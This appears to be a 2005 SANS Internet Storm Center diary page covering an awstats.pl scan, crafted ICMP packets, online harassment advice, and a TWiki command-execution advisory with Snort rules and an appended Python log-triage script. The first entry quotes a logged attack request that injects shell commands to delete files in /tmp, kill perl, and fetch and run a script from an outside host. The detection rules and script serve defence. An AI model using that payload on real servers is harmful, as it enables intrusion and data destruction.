Notes from the DShield Forum

Published: 2005-09-16
Last Updated: 2005-09-18 12:58:56 UTC
by Lenny Zeltser (Version: 1)
There were a few posts to the DShield discussion forum today that are worth watching for, even though at the moment they are single observations and not part of any trend.

Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:

[04:06:01 +0100] GET //awstats.pl?configdir=
  |echo%20;cd%20/tmp;rm%20-rf%20*;
  killall%20-9%20perl;wget%20members.lycos.co.uk/mariusbou/a.txt;
  perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -


In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:

16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0, 
flags [none], length: 56)
219.158.8.221 > xx.xx.xx.xx:
icmp 36: time exceeded in-transit for IP
(tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
xx.xx.xx.xx.11582 > 222.168.227.212.80: [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7

For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)

Are you being harassed or stalked online?

Published: 2005-09-16
Last Updated: 2005-09-16 19:30:27 UTC
by Deborah Hale (Version: 3)
We received an email today from someone who is concerned
that they are being harassed by someone online. The
individual was asking the Handler's group for help in
finding someone to help her track down an online
attacker.

I wanted to address this issue here. I have investigated
similar claims in the past. Without getting into much
detail about the particular incident (to protect the
identity of both the innocent and the guilty) I want to
discuss my response to those who are concerned about
Cyber Harassment and Stalking.

Is it possible that someone could accomplish this?
Absolutely. Is it likely? - Not under normal
circumstances.

A lot of things could be happening behind the scenes.

* You may have spyware or viruses on your computer that
are allowing certain confidential information to leak
out.

* You may have given someone more information than you
should have in a chat room or email.

* You may have a computer that lacks sufficient
protection (firewall, anti-virus program,
operating system updates, etc.).

In the case that I investigated - the "victim" claimed
that they knew who the people were that were
responsible. There was no evidence that anyone had done
anything to the computer. Nothing more than the
installation of the normal - run of the mill spyware and
adware was found.

It is highly unlikely that this type of activity is
taking place. What is more than likely taking place is
what we see evidence of everyday at the Storm Center and
elsewhere on the Internet. Take a look at the Internet
Storm Center - you will see referenced the Survival Time
and a link to the Survival Time History. The Survival
Time right now - today is 23 minutes. That means that a
computer - unprotected with no firewall, anti virus,
spyware/adware protection will likely become infected in
just 23 minutes. That is all the longer it takes to
compromise a brand spanking new computer - out of the
box. Now take a look at the History link. You see that
we had less than 10 minutes in May 2004 and less than 5
minutes in August 2004 (Blaster).

Take a look at the Top 10 Ports and you will see that
there is continuous port activity. That is the nature of
the Internet: with 65,565 ports available, you are bound
to see some of them alive doing things like POP mail
(110), web (80), DNS (53), etc.

So what can you do to protect yourself and your
computer?

Here is a link to the Survival Guide. This document
will help you put the things in place to minimize the
potential for someone to break into your computer.

http://isc.sans.org/presentations/xpsurvivalguide.pdf

What do you do if you think you are being harassed?

Don't jump to conclusions.

Contact your local Police Department or your local FBI
office. They can investigate your issues and if they
suspect that you do have a problem they can conduct a
full investigation.

Don't give out personally identifiable information
either online or by telephone if you did not initiate
the contact. Use caution when sharing information with
others - even if you did initiate the contact. Give
only the information that is essential to complete the
transaction or enquiry.

Only you can protect yourself and your identity.

Updates:

Luis Muñoz kindly translated this diary entry into Spanish. You may download the Spanish text here.

Sue Gray sent us a note about the Working to Halt Online Abuse website, which people who find themselves abused online may find useful: http://www.haltabuse.org.

A TWiki Vulnerability Allows Remote Code Execution

Published: 2005-09-16
Last Updated: 2005-09-16 18:51:30 UTC
by Lenny Zeltser (Version: 2)
A recent vulnerability in TWiki software allows remote attackers to execute arbitrary commands on the affected system with the privileges of the Web server process. We received reports that attackers are beginning to exploit this vulnerability, which increases the severity of this flaw.

To learn more about this problem, and to download a patch, go to:
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev

TWiki is a popular web-based collaboration tool. If you have it installed, we urge you to patch it as soon as possible. We are expecting to see a worm that exploits the recent vulnerability pretty soon.

Chas Tomlin provided us with the following Snort signature, which he put together with help from others:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; uricontent:"/bin/view/Main/TWikiUsers?"; nocase; pcre:"/rev=\d+%20/i"; classtype:web-application-activity; reference:url,secunia.com/advisories/16820/; sid:2002366; rev:2;)

This rule is also available from the Bleeding Snort website.

Update: Joel Esler also shared the following signature with us, which catches a greater number of attack execution paths and reduces the number of false positives:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC Twiki shell command execution"; flow:to_server,established; uricontent:"/TwikiUsers?rev="; content:"|60|"; classtype:web-application-activity; rev:2;)

This version of the rule will be included in Snort's official rule set.
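
As a complement to the Snort signatures above and to the awstats.pl scan quoted earlier on this page, the following added example (not part of the original diary and not code from TWiki, AWStats or Snort) reviews web server access-log lines after the fact for the same two request patterns. The names `classify`, `triage`, `SHELL_META` and `CHECKS` are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote, unquote_plus

# Characters that let a parameter value break out into a shell command.
SHELL_META = re.compile(r"[|;`&]|\$\(")
REQUEST = re.compile(r"\b(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d")

# One entry per diary item: (label, path suffix, parameter, extra bad pattern).
CHECKS = [
    ("awstats configdir injection", "awstats.pl", "configdir", None),
    # The first TWiki signature keys on a space after the revision number.
    ("TWiki rev injection", "/twikiusers", "rev", re.compile(r"\s")),
]

def classify(log_line):
    """Return a label for a suspicious request line, or None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    path = unquote(path).lower()
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        # Decode percent-encoding before matching on the value.
        params[unquote_plus(name).lower()] = unquote_plus(value)
    for label, suffix, name, extra in CHECKS:
        value = params.get(name)
        if value is None or not path.endswith(suffix):
            continue
        if SHELL_META.search(value) or (extra and extra.search(value)):
            return label
    return None

# Constructed sample lines; the first is shortened from the awstats scan on this page.
SAMPLE_LOG = [
    "[04:06:01 +0100] GET //awstats.pl?configdir=|echo%20;cd%20/tmp;echo| HTTP/1.1 404 287 -",
    "[04:07:10 +0100] GET /cgi-bin/view/Main/TWikiUsers?rev=2%20%60PLACEHOLDER%60 HTTP/1.1 200 512 -",
    "[04:08:22 +0100] GET /cgi-bin/view/Main/TWikiUsers?rev=1.5 HTTP/1.1 200 9144 -",
    "[04:09:03 +0100] GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1 200 3021 -",
]

def triage(lines):
    """Return (label, line) pairs for the lines that need a closer look."""
    return [(label, line) for line in lines if (label := classify(line))]

if __name__ == "__main__":
    for label, line in triage(SAMPLE_LOG):
        print(f"{label}: {line}")
```

A hit with a 404 status, as in the awstats case, indicates a scan only; a hit with a 200 status against an installed, unpatched script warrants a closer look at the host.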

Where does all the data come from?

Published: 2005-09-16
Last Updated: 2005-09-16 03:22:12 UTC
by Deborah Hale (Version: 2)
Take a look at the Flash Movie that our own Dr J. put
together. It shows where the data received by the
DShield database server in the last 5 minutes
originated.

http://isc.sans.org/packetattack.php

(I particularly like the representation of the data
received from the US - it appears that Johannes too
understands that Iowa is indeed the Center of the US.)